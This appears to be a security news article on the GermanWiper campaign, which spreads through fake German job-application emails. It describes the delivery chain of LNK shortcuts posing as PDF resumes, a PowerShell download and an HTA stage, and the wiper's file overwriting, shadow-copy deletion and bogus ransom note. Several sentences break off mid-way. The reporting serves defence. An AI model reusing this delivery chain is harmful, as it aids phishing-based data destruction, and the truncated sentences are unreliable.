The messages have the subject “Ihr Stellenangebot – Bewerbung [Your job offer – Application] – Lena Kretschmer” and have an attachment titled “Unterlagen_Lena_Kretschmer.zip”.
The archive in attachment contains two files that pretend to be PDF resumes for the sender, instead, they are actually shortcuts (LNK) that execute a PowerShell command to download an HTA file from the
The HTA will download the ransomware executable and save it to the C:\Users\Public folder and as an executable having a file name composed of three letters, then the GermanWiper is launched.
The malicious code was first reported on the
Once infected a system, the GermanWiper deletes files and leaves a ransom note asking for the payment of BTC 0.15038835.
Anyway, the operators behind this campaign tell to the victims that their data was encrypted and not deleted, they used a set of Bitcoin addresses for the payment.
The reality is that the malware simply overwrites the content of the file with zeroes and ones.
“The first sample seen by security researchers was built on Monday, July 29. The ID Ransomware service started to receive submissions the same day, a little after 10 AM CEST, MalwareHunterTeam told BleepingComputer.” reported BleepingComputer.
The following graph shows the number of submissions for GermanWiper to the ID Ransomware service, suggesting the activity is still ongoing.
Experts at BleepingComputer published several details about the wiper. When the malware is launched, it attempts to terminate processes associated with any software (i.e. notepad.exe, mysql.exe
The wiper skips files that are essential for Windows to work correctly, it appends to the filenames of deleted files a random 5 character extension to trick the victim into believing that they have been encrypted by ransomware.
Once complete the deletion process, GermanWiper also removes the shadow volume copies and disables Windows automatic startup repair.
Experts noticed that GermanWiper has some similarities with a variant of the Sodinokibi ransomware that was involved in a recent spam campaign impersonating BSI.
Furthermore, the same delivery method used by Sodinokibi (malicious shortcut files masquerading as PDFs, and the use of HTA to extract and deploy the malware) is observed in the GermanWiper attacks.
The German CERT also warned of the Germanwiper campaign:
Further technical details are available in the analysis published by BleepingComputer.